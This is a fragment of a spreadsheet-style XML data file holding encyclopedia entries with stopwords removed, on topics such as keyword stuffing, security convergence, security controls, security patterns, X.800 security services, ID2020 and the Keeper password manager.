    <t>keyword stuffing search engine optimization (seo) technique, considered webspam spamdexing, keywords loaded page's meta tags, visible content, backlink anchor text attempt gain unfair rank advantage search engines. keyword stuffing lead website temporarily permanently banned penalized major search engines. repetition words meta tags explain many search engines longer tags. nowadays, search engines focus content unique, comprehensive, relevant, helpful overall makes quality better makes keyword stuffing useless, still practiced many webmasters.many major search engines implemented algorithms recognize keyword stuffing, reduce eliminate unfair search advantage tactic intended gain, oftentimes also penalize, demote remove websites indexes implement keyword stuffing. changes algorithms specifically intended penalize sites using keyword stuffing include google florida update (november 2003) google panda (february 2011) google hummingbird (august 2013) bing's september 2014 update. history keyword stuffing used past obtain search engine rankings visibility particular phrases. this method outdated adds value rankings today. particular, google longer gives good rankings pages employing technique. hiding text visitor done many different ways. text colored blend background, z-index positioning place text underneath image therefore view visitor absolute positioning text positioned page center common techniques. 2005, many invisible text techniques easily detected major search engines. "noscript" tags another place hidden content within page. while valid optimization method displaying alternative representation scripted content, abused, since search engines index content invisible visitors. sometimes inserted text includes words frequently searched (such "sex"), even terms bear little connection content page, order attract traffic advert-driven pages. past, keyword stuffing considered either white black tactic, depending context technique, opinion person judging while great deal keyword stuffing employed spamdexing, little benefit user, keyword stuffing certain circumstances intended skew results deceptive manner. whether term carries pejorative neutral connotation dependent whether practice used pollute results pages little relevance, direct traffic page relevance would otherwise de-emphasized search engine's inability interpret understand related ideas. this longer case. search engines employ themed, related keyword techniques interpret intent content page. online journalism headlines online news sites increasingly packed search-friendly keywords identify story. traditional reporters editors frown practice, effective optimizing news stories search. also cloaking content farm doorway pages hidden text link farming scraper site spamdexing white fonting references external links google guidelines yahoo! guidelines live search (msn search) guidelines</t>
  </si>
  <si>
    <t>Security convergence</t>
  </si>
  <si>
    <t>security convergence refers convergence historically distinct security functions physical security information security within enterprises; integral parts coherent risk management program. security convergence motivated recognition corporate assets increasingly information-based. past, physical assets demanded bulk protection efforts, whereas information assets demanding increasing attention. although generally used relation cyber-physical convergence, security convergence also refer convergence security related risk resilience disciplines, including business continuity planning emergency management. security convergence often referred 'converged security'. definitions according united states cybersecurity infrastructure security agency, security convergence "formal collaboration previously disjointed security functions." survey participants asis foundation study state security convergence united states, europe, india define security convergence "getting security/risk management functions work together seamlessly, closing gaps vulnerabilities exist space functions."in book security convergence: managing enterprise security risk, dave tyson defines security convergence "the integration cumulative security resources organization order deliver enterprise-wide benefits enhanced risk mitigation, increased operational effectiveness efficiency, cost savings." background concept security convergence gained currency within context fourth industrial revolution, which, according founder executive chairman world economic forum (wef) klaus schwab, characterised fusion technologies blurring lines physical, digital, biological spheres." results fusion include developments cyber-physical systems (cps) growth internet things (iot), seen proliferation number types internet connected physical objects. 2017, gartner predicted would billion internet-connected things 2020.security convergence endorsed early 2007 three leading international organizations security professionals asis international, isaca issa together co-founded alliance enterprise security risk management part, promote concept. types convergence cyber-physical convergence risk convergence context internet things, cyber threats readily translate physical consequences, physical security breaches also extend organisation's cyber threat surface. according united states cybersecurity infrastructure security agency, "the adoption integration internet things (iot) industrial internet things (iiot) devices increasingly interconnected mesh cyber-physical systems (cps), expands attack surface blurs clear functions cybersecurity physical security."according global risks report 2020, "operational technologies increased risk cyberattacks could cause traditional, kinetic impacts technology extended physical world, creating cyber-physical system". according united states department homeland security, "the consequences unintentional faults malicious attacks cyber-physical systems] could severe impact human lives environment."notable examples attacks internet connected facilities include 2010 stuxnet attack iran's natanz nuclear facilities december 2015 ukraine power grid cyberattack. “today’s threats result hybrid blended attacks utilizing information technology (it), physical infrastructure, operational technology (ot) enemy avenue approach," notes former cisa assistant director infrastructure security brian harrell. "highlighting future threat landscape ensure better situational awareness rapid response.” organisational convergence traditionally distinct, 'siloed', approaches physical security cyber security viewed proponents security convergence unable adequately protect organisation attacks involving cyber physical (cyber-physical) dimensions. organisational aspect security convergence focuses extent organisation's internal structure capable adequately addressing converged security risks. according cybersecurity infrastructure security agency, "physical security cybersecurity divisions often still treated separate entities. when security leaders operate siloes, lack holistic view security threats targeting enterprise. result, attacks likely occur". "many conventional physical information security risks viewed isolation," states pricewaterhousecoopers document convergence security risks. "these risks converge overlap specific points risk lifecycle, such, could become blind spot organisation individuals responsible risk management."in survey 1,000 senior physical security, cybersecurity, disaster management, business continuity professionals, asis foundation study state security convergence united states, europe, india found despite “years predictions inevitability security convergence, percent respondents converged physical cybersecurity functions.” survey also found percent organisations converged security functions reported positive results convergence, percent reporting convergence strengthened overall security. overall, percent surveyed believed convergence would strengthen overall security function. citing work wright forrester systems thinking, optic security group jason cherrington argues system systems approach provides useful lens understanding security sub-groups within organisation contribute organisation's overall security goals. ideal world, organisations would security collection task-oriented dedicated systems pool resources capabilities together part overall system offering functionality performance parts. importantly, oversight overall system would ensure gaps component systems identified failures avoided." solutions convergence (unified security) increasing prevalence hybridised cyber-physical security threats driven parallel emergence range converged security solutions cover cyber physical domains. according jason cherrington, contemporary security threats we’re seeing convergence physical digital vectors; protection hybridised threats requires hybridised approach." according united states cybersecurity infrastructure security agency: "organizations converged cybersecurity physical security functions resilient better prepared identify, prevent, mitigate, respond threats. convergence also encourages information sharing developing unified security policies across security divisions." bibliography anderson, "convergence: holistic approach risk management", network security, elsevier, ltd., volume 2007, issue 2007. anderson, security professionals must evolve changing market", magazine, october 2006. references external links alliance enterprise security risk management</t>
  </si>
  <si>
    <t>Security engineering</t>
  </si>
  <si>
    <t>security engineering process incorporating security controls information system controls become integral part system’s operational capabilities. similar systems engineering activities primary motivation support delivery engineering solutions satisfy pre-defined functional user requirements, added dimension preventing misuse malicious behavior. those constraints restrictions often asserted security policy. form another, security engineering existed informal field study several centuries. example, fields locksmithing security printing around many years. concerns modern security engineering computer systems first solidified rand paper 1967, "security privacy computer systems" willis ware. this paper, later expanded 1979, provided many fundamental information security concepts, labelled today cybersecurity, impact modern computer systems, cloud implementations embedded iot. recent catastrophic events, notably 9/11, made security engineering quickly become rapidly-growing field. fact, report completed 2006, estimated global security industry valued $150 billion. security engineering involves aspects social science, psychology (such designing system "fail well", instead trying eliminate sources error), economics well physics, chemistry, mathematics, criminology architecture, landscaping. some techniques used, fault tree analysis, derived safety engineering. other techniques cryptography previously restricted military applications. pioneers establishing security engineering formal field study ross anderson. qualifications single qualification exists become security engineer. however, undergraduate and/or graduate degree, often computer science, computer engineering, physical protection focused degrees security science, combination practical work experience (systems, network engineering, software development, physical protection system modelling etc.) qualifies individual succeed field. other degree qualifications security focus exist. multiple certifications, certified information systems security professional, certified physical security professional available demonstrate expertise field. regardless qualification, course must include knowledge base diagnose security system drivers, security theory principles including defense depth, protection depth, situational crime prevention crime prevention environmental design protection strategy (professional inference), technical knowledge including physics mathematics design commission engineering treatment solution. security engineer also benefit knowledge cyber security information security. previous work experience related privacy computer science also valued. knowledge must braced professional attributes including strong communication skills high levels literacy engineering report writing. security engineering also goes label security science. related-fields information securitysee esp. computer security protecting data unauthorized access, use, disclosure, destruction, modification, disruption access.physical securitydeter attackers accessing facility, resource, information stored physical media.technical surveillance counter-measures economics securitythe economic aspects economics privacy computer security. methodologies technological advances, principally field computers, allowed creation complex systems, complex security problems. because modern systems across many areas human endeavor, security engineers need consider mathematical physical properties systems; also need consider attacks people form parts systems using social engineering attacks. secure systems resist technical attacks, also coercion, fraud, deception confidence tricksters. applications according microsoft developer network patterns practices security engineering consist following activities: security objectives security design guidelines security modeling security architecture design review security code review security testing security tuning security deployment reviewthese activities designed help meet security objectives software life cycle. physical understanding typical threat usual risks people property. understanding incentives created threat countermeasures. understanding risk threat analysis methodology benefits empirical study physical security facility. understanding apply methodology buildings, critical infrastructure, ports, public transport facilities/compounds. overview common physical technological methods protection understanding roles deterrence, detection mitigation. determining prioritizing security needs aligning perceived threats available budget. product product security engineering security engineering applied specifically products organization creates, distributes, and/or sells. product security engineering distinct corporate/enterprise security, focuses securing corporate networks systems organization uses conduct business. product security includes security engineering applied hardware devices cell phones, computers, internet things devices, cameras. software operating systems, applications, firmware.such security engineers often employed separate teams corporate security teams work closely product engineering teams. target hardening whatever target, multiple ways preventing penetration unwanted unauthorized persons. methods include placing jersey barriers, stairs sturdy obstacles outside tall politically sensitive buildings prevent truck bombings. improving method visitor management electronic locks take advantage technologies fingerprint scanning, iris retinal scanning, voiceprint identification authenticate users. also references further reading ross anderson (2001). security engineering. wiley. isbn 0-471-38922-6. ross anderson (2008). security engineering guide building dependable distributed systems. wiley. isbn 978-0-470-06852-6. ross anderson (2001). "why information security hard economic perspective" (pdf). proc. annual computer security applications conference. doi:10.1109/acsac.2001.991552. bruce schneier (1995). applied cryptography (2nd ed.). wiley. isbn 0-471-11709-9. bruce schneier (2000). secrets lies: digital security networked world. wiley. isbn 0-471-25311-1. david wheeler (2003). "secure programming linux unix howto". linux documentation project. archived original 2007-04-28. retrieved 2005-12-19. ross, michael mcevilley, janet carrier oren (2016). "systems security engineering" (pdf). internet things. retrieved 2016-11-22.{{cite web}}: maint: multiple names: authors list (link) articles papers patterns practices security engineering channel9 patterns practices security engineering msdn patterns practices security engineering explained basic target hardening government south australia</t>
  </si>
  <si>
    <t>Security controls</t>
  </si>
  <si>
    <t>security controls safeguards countermeasures avoid, detect, counteract, minimize security risks physical property, information, computer systems, assets. field information security, controls protect confidentiality, integrity availability information. systems controls referred frameworks standards. frameworks enable organization manage security controls across different types assets consistency. types security controls security controls classified various criteria. example, controls occasionally classified relative security breach: before event, preventive controls intended prevent incident occurring e.g. locking unauthorized intruders; during event, detective controls intended identify characterize incident progress e.g. sounding intruder alarm alerting security guards police; after event, corrective controls intended limit extent damage caused incident e.g. recovering organization normal working status efficiently possible.security controls also classified according characteristics, example: physical controls e.g. fences, doors, locks fire extinguishers; procedural administrative controls e.g. incident response processes, management oversight, security awareness training; technical logical controls e.g. user authentication (login) logical access controls, antivirus software, firewalls; legal regulatory compliance controls e.g. privacy laws, policies clauses.for information security controls computing, defense depth (computing) information security information security standards control frameworks numerous information security standards promote good security practices define frameworks systems structure analysis design managing information security controls. some well known standards outlined below. international standards organization iso/iec 27001 specifies controls groups: a.5: information security policies a.6: information security organised a.7: human resources security controls applied before, during, employment. a.8: asset management a.9: access controls managing user access a.10: cryptographic technology a.11: physical security organisation's sites equipment a.12: operational security a.13: secure communications data transfer a.14: secure acquisition, development, support information systems a.15: security suppliers third parties a.16: incident management a.17: business continuity/disaster recovery extent affects information security) a.18: compliance internal requirements, policies, external requirements, laws. u.s. federal government information security standards federal information processing standards (fips) apply government agencies. however, certain national security systems, purview committee national security systems, managed outside standards. federal information processing standard (fips 200), "minimum security requirements federal information information systems," specifies minimum security controls federal information systems processes risk-based selection security controls occurs. catalog minimum security controls found nist special publication 800-53. fips identifies broad control families: access control. awareness training. audit accountability. security assessment authorization. (historical abbreviation) configuration management. contingency planning. identification authentication. incident response. maintenance. media protection. physical environmental protection. planning. personnel security. risk assessment. system services acquisition. system communications protection. system information integrity.national institute standards technology nist cybersecurity framework maturity based framework divided five functional areas approximately individual controls "core." nist sp-800-53 database nearly thousand technical controls grouped families cross references. starting revision 800-53, program management controls identified. these controls independent system controls, necessary effective security program. starting revision 800-53, eight families privacy controls identified align security controls privacy expectations federal law. starting revision 800-53, controls also address data privacy defined nist data privacy framework. commercial control sets cobit5 proprietary control published isaca. governance enterprise evaluate, direct monitor (edm) processes management enterprise align, plan organise (apo) processes build, acquire implement (bai) processes deliver, service support (dss) processes monitor, evaluate assess (mea) processes top-20 commercially licensable control published center internet security. controls developed network volunteers made available commercial license agreement. mitigation open (creative commons) commercially licensable control threat sketch. open: business language mitigations mapped hundred nist cybersecurity framework controls. open: business language mitigations mapped nearly thousand nist sp-800-53 controls. telecommunications telecommunications, security controls defined security services part reference model itu-t x.800 recommendation. 7498-2these technically aligned. this model widely recognized. data liability (legal, regulatory, compliance) intersection security risk laws standards care data liability defined. handful databases emerging help risk managers research laws define liability country, province/state, local levels. control sets, compliance relevant laws actual risk mitigators. perkins coie security breach notification chart: articles (one state) define data breach notification requirements among states. ncsl security breach notification laws: list state statutes define data breach notification requirements. jurisdiction: commercial cybersecurity research platform coverage 380+ state federal laws impact cybersecurity breach. jurisdiction also maps nist cybersecurity framework. business control frameworks there wide range frameworks standards looking internal business, inter-business controls, including: ssae isae 3402 payment card industry data security standard health insurance portability accountability cobit top-20 nist cybersecurity framework also access control countermeasure environmental design information security reference model physical security risk security security engineering security management security services references nist 800-53 revision instruction 8500.2 fismapedia terms</t>
  </si>
  <si>
    <t>ID2020</t>
  </si>
  <si>
    <t>id2020 nongovernmental organization (501(c)(3)) advocates digital billion undocumented people worldwide under-served groups like refugees. dakota gruener executive director id2020. relatively unknown publicized misinformation related covid-19 pandemic conspiracy theorists. history 2016, united nations headquarters york, inaugural id2020 summit brought together people discuss provide digital identity all, defined sustainable development goal including billion people living without form recognized identification. experts blockchain cryptographic technology joined representatives technical standards bodies identify technology private sector expertise could achieve goal.the 2018 summit held september 2018, focused defining constitutes "good" digital sponsors event included united nations office information communications technology (oict), united nations refugee agency, international telecommunication union consulate general denmark york.in 2019, id2020 started digital identity program collaboration government bangladesh global alliance vaccines immunization. mission id2020 public-private consortium service united nations 2030 sustainable development goal providing legal identity people, including world's vulnerable populations.id2020 published ten-point mission statement, includes: believe individuals must control digital identities, including personal data collected, used, shared." participants organizations currently formerly participating id2020 initiative include: covid-19 conspiracy theory conspiracy theorists falsely alleged id2020 bill gates made plans mandatory covid-19 vaccination implantation microchips patients' bodies. result conspiracy theories, staff id2020 received death threats. references external links official website world health organization: coronavirus disease (covid-19) advice public: myth busters coronavirus politifact</t>
  </si>
  <si>
    <t>Security modes</t>
  </si>
  <si>
    <t>generally, security modes refer information systems security modes operations used mandatory access control (mac) systems. often, systems contain information various levels security classification. mode operation determined type users directly indirectly accessing system. type data, including classification levels, compartments, categories, processed system. type levels users, need know, formal access approvals users have. dedicated security mode mode operation, users must have: signed information system. proper clearance information system. formal access approval information system. valid need know information system.all users access data. system high security mode system high mode operation, users must have: signed information system. proper clearance information system. formal access approval information system. valid need know some information system.all users access some data, based need know. compartmented security mode mode operation, users must have: signed information system. proper clearance information system. formal access approval some information access system. valid need know some information system.all users access some data, based need know formal access approval. multilevel security mode multilevel security mode operation (also called controlled security mode), users must have: signed information system. proper clearance some information system. formal access approval some information system. valid need know some information system.all users access some data, based need know, clearance formal access approval summary also access control multifactor authentication bell–lapadula model biba model clark-wilson model discretionary access control (dac) graham-denning model multilevel security (mls) mandatory access control (mac) security security engineering take-grant model references krutz, ronald vines, russell dean, cissp prep guide; gold edition, wiley publishing, inc., indianapolis, indiana, 2003. external links 5200.28 defines security terms</t>
  </si>
  <si>
    <t>IDIS (company)</t>
  </si>
  <si>
    <t>idis (054800:ks) security technology company based south korea. headquartered outside seoul operates globally regional offices strategic partners. idis million recorders installed worldwide 16.5 million cameras idis technology. company twice named "best billion" forbes. history idis founded 1997 y.d. kim, albert ryu, j.h. jeong, intelligent digital integrated security co., ltd., focus digital video recording (dvr) technology. company quickly grew, gaining certification "technology venture oriented company" 1999, listing kosdaq stock exchange 2001. company also became number seller dvrs surveillance industry, original design manufacturer/original equipment manufacturer (odm/oem) leading surveillance solution providers. mid-2000s, company began series in-house innovations acquisitions expanded company's focus beyond dvrs include next-generation camera network video recording (nvr) offerings industrial display technologies. 2013, idis implemented changes business began transition away supplier manufactured goods companies towards selling branded products. part change, idis launched branded security solution, directip™, 2013 ifsec international security exhibition birmingham, united kingdom. company subsequently launched directip components idis total solution middle east 2014, intersec exhibition dubai, united arab emirates, americas 2015, west trade show vegas, nevada. regional launch, company debuted regional headquarters staff dedicated sale support idis branded offerings areas. currently, y.d. serves idis. products idis designs, develops, manufacturers cameras, recorders across different technology platforms, software, monitors display. company's self-described "idis total solution" delivered three primary offerings: directip, idis solution suite, directcx. directip, introduced 2013 ifsec security show london, company’s flagship offering plug-and-play, single-source range cameras, nvrs, monitors—including support h.265. idis solution suite full featured video management system (vms) universally compatible recording platforms, designed responsive cost-effective using modular format, customers purchase feature sets need, recording, backup, redundant recording, failover, video wall services. directcx idis's hd-tvi offering, providing coaxial cabling, support hd-tvi 2.0. directcx cameras, recorders, idis solution suite designed complement existing investments coaxial cabling, complete remake surveillance technology desired. common, virtually-identical user interface (gui) across idis products distinguishing feature promoted company. innovation idis early pioneer digital video recording, leading security industry's shift recording technology, growing become world's selling provider dvrs security marketplace. idis held position company's strategic shift focus toward development sale latest-generation technologies mid-to-late 2010s. additional technical milestones include idis's release ras, mobile remote review mobile phones 2007, (featured camera) mmx, mini-matrix switcher, 2008. 2009, idis developed launched isp100, h.264 based image processing dvrs well inex, vms. company's proprietary directip technology resulted numerous accolades recognition idis, named "technology innovation year" 2014 premier awards london, england. directip also recognized highest honors inaugural korea high-tech safety industry product technology awards, recognition "directip’s contributions solving difficult problems, compatibility challenges connectivity issues facing network surveillance market."in 2015, idis super fisheye camera received multiple industry accolades technological performance innovation upon release, 2016, company debuted "smart controls point-and-zoom technology, aiming increase accuracy ease camera operators. product named security products magazine united states "new product year" later year.idis's focus simplifying user experiences improving fundamental surveillance qualities (such image clarity) important end-users regularly remarked upon security industry media. 2015, industry editor larry anderson specifically noted company's "timely emphasis end-to-end solutions 'plug-and-play'" covering company's debut north american market. benchmark magazine, 2015 review idis fisheye camera, noted company's high performance technology, specifically praising idis's clean imagery, admirably intuitive straightforward configuration/installation. awards idis received multiple awards, honors, recognition successful business practices, growth, technological innovations. locations addition idis headquarters corporate offices outside seoul, south korea, idis maintains offices regional responsibilities throughout world, including idis europe, located near london, united kingdom; idis middle east, based dubai, united arab emirates; idis america, located near dallas, texas, united states. idis holdings co., ltd. idis business falls idis holdings co., ltd., parent company annual turnover $450m. company's subsidiaries include kortek corporation, leading manufacturer display technologies industry use; co., ltd., video surveillance technology company; corp., ltd., manufacturers card printers." references</t>
  </si>
  <si>
    <t>Security pattern</t>
  </si>
  <si>
    <t>security patterns applied achieve goals area security. classical design patterns different instantiations fulfill information security goal: confidentiality, integrity, availability. additionally, create design pattern specifically achieve security goal. existing security pattern pattern community provided collection security patterns, discussed workshops pattern languages programs (plop) conferences. they unified published joint project.the open group provides documented security patterns. available system patterns these patterns concerned availability assets. assets either services resources offered users. check-pointed system pattern describes design replication (computer science) recover component fails. standby pattern goal provide fall back component able resume service failing component. comparator-checked fault tolerant system pattern provides monitor failure-free behavior component. replicated system pattern describes design redundant components, means load balancing redirection decrease chance non-availability service. error detection/correction pattern goal deduce errors possibly correct guarantee correct information exchange storage. protected system patterns this patterns concerned confidentiality integrity information providing means manage access usage sensitive data. protected system pattern provides reference monitor enclave owns resources therefore must bypassed access. monitor enforces single point policy. refers "protection proxy". policy pattern architecture decouple policy normal resource code. authenticated user owns security context (erg. role) passed guard resource. guard checks inside policy whether context user rules match provides denies access resource. authenticator pattern also known pluggable authentication modules java authentication authorization service (jaas). subject descriptor pattern secure communication similar single sign-on, rbac security context combination communication protection proxy, security context subject descriptor pattern. security association extension secure communication pattern. secure proxy pattern used defense depth. security patterns java services identity management this security patterns evolved java center microsystems engineers ramesh nagappan christopher steel, helps building end-to-end security multi-tier java enterprise applications, xml-based services, enabling identity management applications including single sign-on authentication, multi-factor authentication, enabling identity provisioning web-based applications. authentication enforcer pattern used manage delegate authentication processes authorization enforcer pattern used manage delegate authorization processes intercepting validator pattern helps performing security validation input data clients secure base action pattern shows centralizing handling security tasks base action class secure logger pattern used sensitive data ensuring tamper-proof storage secure session manager shows securely centralizing session information handling agent interceptor pattern shows interceptor mechanism provide security applications obfuscated transfer object pattern shows protect data passed around transfer objects application tiers audit interceptor pattern shows capture security-related events support logging auditing message inspector pattern shows verification validation message-level security mechanisms, signature encryption conjunction security token. message interceptor gateway pattern shows single entry point solution centralization security enforcement incoming outgoing service messages. helps apply transport-level message-level security mechanisms required securely communicating services endpoint. secure message router pattern facilitates secure communication multiple partner endpoints adopt message-level security. acts security intermediary component applies message-level security mechanisms deliver messages multiple recipients intended recipient would able access required portion message remaining message fragments made confidential. single sign-on (sso) delegator pattern describes construct delegator agent handling legacy system single sign-on (sso). assertion builder pattern defines identity assertion (for example, authentication assertion authorization assertion) built. credential synchroniser pattern describes securely synchronize credentials principals across multiple applications using identity provisioning references external links yoshioka, washizaki, maruyama, survey security patterns, progress informatics, 35–47, (2008) open group security pattern guide microsoft patterns practices group ramesh nagappan, security patterns j2ee applications, services, identity management, service provisioning</t>
  </si>
  <si>
    <t>Security question</t>
  </si>
  <si>
    <t>security question form shared secret used authenticator. commonly used banks, cable companies wireless providers extra security layer. history financial institutions used questions authenticate customers since least early 20th century. 1906 speech meeting section american bankers association, baltimore banker william hayden described institution's security questions supplement customer signature records. described signature cards used opening accounts, spaces customer's birthplace, "residence," mother's maiden name, occupation age.hayden noted items often left blank "residence" information used primarily contact customer, mother's maiden name useful "strong test identity." although observed rare someone outside customer's family withdraw money customer account, said mother's maiden name useful verification rarely known outside family even people opening accounts "often unprepared question." similarly, modern practice, credit card provider could request customer's mother's maiden name issuing replacement lost card.in 2000s, security questions came widespread internet. form self-service password reset, security questions reduced information technology help desk costs. allowing security questions online, rendered vulnerable keystroke logging brute-force guessing attacks, well phishing. addition, whereas human customer service representative able cope inexact security answers appropriately, computers less adept. such, users must remember exact spelling sometimes even case answers provide, poses threat answers written down, exposing physical theft. application commonplace nature social-media, many older traditional security questions longer useful secure. important remember security question another password. therefore, security question shared anyone else, include information readily available social media websites, remaining simple, memorable, difficult guess, constant time. understanding every question work everyone, u.s. network security provider, division corporation) gives banks questions choose from.many questioned usefulness security questions. security specialist bruce schneier points since public facts person, easier guess hackers passwords. users know create fake answers questions, forget answers, thus defeating purpose creating inconvenience worth investment. also cognitive password knowledge-based authentication password fatigue references</t>
  </si>
  <si>
    <t>Security service (telecommunication)</t>
  </si>
  <si>
    <t>security service service, provided layer communicating open systems, ensures adequate security systems data transfers defined itu-t x.800 recommendation. x.800 7498-2 (information processing systems open systems interconnection basic reference model part security architecture) technically aligned. this model widely recognized general definition cnss instruction 4009 dated april 2010 committee national security systems united states america: capability supports one, more, security requirements (confidentiality, integrity, availability). examples security services management, access control, authentication.another authoritative definition service glossary adopted nist 800-95: processing communication service provided system give specific kind protection resources, said resources reside said system reside systems, example, authentication service pki-based document attribution authentication service. security service superset services. security services typically implement portions security policies implemented security mechanisms. basic security terminology information security computer security disciplines dealing requirements confidentiality, integrity, availability, so-called triad, information asset organization (company agency) information managed computers respectively. there threats attack resources (information devices manage exploiting vulnerabilities. resources protected countermeasures security controls.so security services implement part countermeasures, trying achieve security requirements organization. basic terminology order different devices (computers, routers, cellular phones) communicate data standardized way, communication protocols defined. itu-t organization published large protocols. general architecture protocols defined recommendation x.200.the different means (air, cables) ways (protocols protocol stacks) communicate called communication network. security requirements applicable information sent network. discipline dealing security network called network security.the x.800 recommendation: provides general description security services related mechanisms, provided reference model; defines positions within reference model services mechanisms provided.this recommendation extends field application recommendation x.200, cover secure communications open systems. according x.200 recommendation, so-called reference model layers, generically called layer. entity transmission services entity.at level entities (n-entity) interact means protocol transmitting protocol data units (pdu). service data unit (sdu) specific unit data passed layer, lower layer, encapsulated pdu, lower layer. data sent user services given layer, transmitted semantically unchanged peer service user given layer, layer 'n', layer below, layer 'n-1'. effect 'payload' given pdu. that process changing pdu, consists encapsulation process, performed lower layer. data contained becomes encapsulated within pdu. layer adds headers footers, both, sdu, transforming layer n-1. added headers footers part process used make possible data source destination. security services description following considered security services provided optionally within framework reference model. authentication services require authentication information comprising locally stored information data transferred (credentials) facilitate authentication: authentication these services provide authentication communicating peer entity source data described below. peer entity authentication this service, provided (n)-layer, provides corroboration 1)-entity peer entity claimed 1)-entity. data origin authentication this service, provided (n)-layer, provides corroboration 1)-entity source data claimed peer 1)-entity.access control this service provides protection unauthorized resources accessible osi. these non-osi resources accessed protocols. this protection service applied various types access resource (e.g., communications resource; reading, writing, deletion information resource; execution processing resource) accesses resource. data confidentiality these services provide protection data unauthorized disclosure described connection confidentiality this service provides confidentiality (n)-user-data (n)-connection connectionless confidentiality this service provides confidentiality (n)-user-data single connectionless (n)-sdu selective field confidentiality this service provides confidentiality selected fields within (n)-user-data (n)-connection single connectionless (n)-sdu. traffic flow confidentiality this service provides protection information might derived observation traffic flows.data integrity these services counter active threats take forms described below. connection integrity recovery this service provides integrity (n)-user-data (n)-connection detects modification, insertion, deletion replay data within entire sequence (with recovery attempted). connection integrity without recovery previous recovery attempted. selective field connection integrity this service provides integrity selected fields within (n)-user data (n)-sdu transferred connection takes form determination whether selected fields modified, inserted, deleted replayed. connectionless integrity this service, provided (n)-layer, provides integrity assurance requesting 1)-entity. this service provides integrity single connectionless take form determination whether received modified. additionally, limited form detection replay provided. selective field connectionless integrity this service provides integrity selected fields within single connectionless takes form determination whether selected fields modified. non-repudiation this service take forms. non-repudiation proof origin recipient data provided proof origin data. this protect attempt sender falsely deny sending data contents. non-repudiation proof delivery sender data provided proof delivery data. this protect subsequent attempt recipient falsely deny receiving data contents. specific security mechanisms security services provided means security mechanism: encipherment digital signature access control data integrity authentication exchange traffic padding routing control notarizationthe table1/x.800 shows relationships services mechanisms some applied connection oriented protocols, connectionless protocols both. table 2/x.800 illustrates relationship security services layers: other related meanings managed security service managed security service (mss) network security services outsourced service provider. also access control availability communication network communication protocol confidentiality countermeasure data integrity digital signature exploit (computer security) information security integrity itu-t managed security service network security model protocol (computing) protocol data unit protocol stack security control security requirements analysis service data unit threat (computer) vulnerability (computing) references external links term fismapedia list itu-t security activities publications</t>
  </si>
  <si>
    <t>Keeper (password manager)</t>
  </si>
  <si>
    <t>keeper password manager created keeper security, inc. allows users store online login credentials, documents images, sensitive information encrypted digital vault. users also store two-factor authentication codes. overview keeper uses freemium pricing model individual consumers subscription-based model households businesses. free individual version keeper offers storage passwords, identity data, financial information, well password generator two-factor authentication (2fa) single mobile device. subscription-based model individual consumers offers additional features, unlimited password, identity data, financial data storage across unlimited number devices, cross-device syncing, record-sharing capabilities. keeper’s “family” plans extend features five people household.keeper also offers variety add-ons additional cost, including: breachwatch, tool monitors dark stolen passwords notifies users credentials found. keeperchat, secure messaging application. keeperchat free individuals sold subscription basis businesses. keeper secure file storage, enables users store confidential files, photos, videos keeper vaults.keeper available mobile android ios, well desktop application windows, linux, macos. also offers desktop browser extension safari, chrome, firefox, edge, internet explorer, opera, brave. mobile app, desktop app, browser extension generate random passwords website accounts fill existing apps accounts automatically.users secure keeper vaults “master password.” users protect keeper vaults variety multi-factor authentication methods, including google authenticator, security, fido u2f, biometrics.keeper utilizes zero-knowledge security architecture, encryption user passwords data performed locally user’s device. customer vaults secured using aes-256 key, derived user’s master password using pbkdf2. only encrypted ciphertext stored keeper’s servers, keeper decrypting data customers store digital vaults, retrieve master passwords.keeper users directly share passwords, files, information “vault vault” keeper users; shared content secured encryption. additionally, keeper's one-time share feature enables users securely share passwords confidential information anyone time-limited basis, even recipient keeper account. one-time shares secured using zero-knowledge encryption; record data decrypted locally, recipient's device, using 256-bit aes, server requests signed elliptic-curve cryptography (ecdsa). keeper business enterprise keeper offers suite cybersecurity products commercial use, integrate other: keeper's enterprise password manager, offers features keeper's consumer product, plus additional tools specific organizations, including multi-tenant password management, user provisioning, auditing, reporting, active directory integration, delegated administration, accessed centralized administration console. keeper secrets manager, stores confidential data related infrastructure, keys, certificates, database passwords, privileged credentials, access keys. keeper connection manager, agentless remote desktop gateway enables admins devops teams securely access rdp, ssh, mysql kubernetes endpoints browser. keeper connection manager built open-source gateway apache guacamole.business customers also access variety add-on products, including: commercial-grade versions breachwatch, keeperchat, secure file storage. keeper compliance reports, gives keeper administrators visibility access permissions records credentials across organizations. administrators also reports on-demand forward automated compliance systems, send directly external auditors. keeper's advanced reporting alerts module (aram), provides advanced event logging meet compliance requirements. aram track event types, generate custom reports, send alert notifications email sms, feed alert data security information event management (siem) systems. keeper connect, saml saas solution enables businesses integrate existing single sign-on (sso) deployments keeper’s password management platform. keeper security government cloud keeper security government cloud (ksgc) designed specifically u.s. federal, state, municipal government agencies. ksgc first password secrets management platform listed u.s. federal government's fedramp marketplace available govcloud. ksgc also supports compliance united states international traffic arms regulations (itar). history 2009, craig lurey developed original keeper long business flight china darren guccione. 2011, lurey guccione officially co-founded keeper security, inc. march 2022, keeper offices located chicago (headquarters), california (software development), ireland (emea business sales) philippines (international customer support).in october 2019, keeper launched keepermsp, password management platform designed specifically managed service providers (msps), managed security service providers (mssps), customers.in august 2020, keeper received million minority investment venture capital firm insight partners.in march 2021, keeper launched keeper connect.in 2021, keeper became first password management platform listed u.s. federal government’s fedramp marketplace “csp process.”in january 2022, keeper announced launch keeper secrets manager.in february 2022, keeper acquired remote access gateway company glyptodon inc., creator glyptodon enterprise apache guacamole, commenced integrating glyptodon enterprise product suite.in 2022, keeper launched keeper connection manager, rebranding revamping glyptodon enterprise commercial-grade remote desktop gateway expanded capabilities, advanced integrations, ongoing feature development. reception world named keeper editor's choice 2019 most security-minded password manager 2022.pcmag named keeper “best password manager businesses" (2022), well best password manager editors' choice previous three consecutive years.tom’s guide named keeper best password managers 2022.u.s. news world report’s reviews team named keeper best overall password manager 2021.keeper recipient multiple infosec awards, sponsored cyber defense magazine handed annually conference: patents keeper holds following patents united states patent trademark office: incidents december 2017, keeper bundled windows microsoft. google security researcher tavis ormandy disclosed software recommended installing browser addon contained vulnerability allowing malicious website steal password. nearly identical vulnerability already previously discovered disclosed keeper 2016. within hours, company issued patch. days later, company makes keeper sued technica, claiming article defamatory misleading. lawsuit dismissed march 2018, technica added clarifications article.following lawsuit, keeper launched public vulnerability disclosure program partnership bugcrowd. compliance audits keeper certified type compliant accordance aicpa service organization control framework. additionally, keeper 27001 certified, certification scoped include management operation keeper's digital vault cloud services, software application development, protection digital assets digital vault cloud services. keeper holds longest-standing 27001 certifications industry.keeper security government cloud (ksgc) listed fedramp 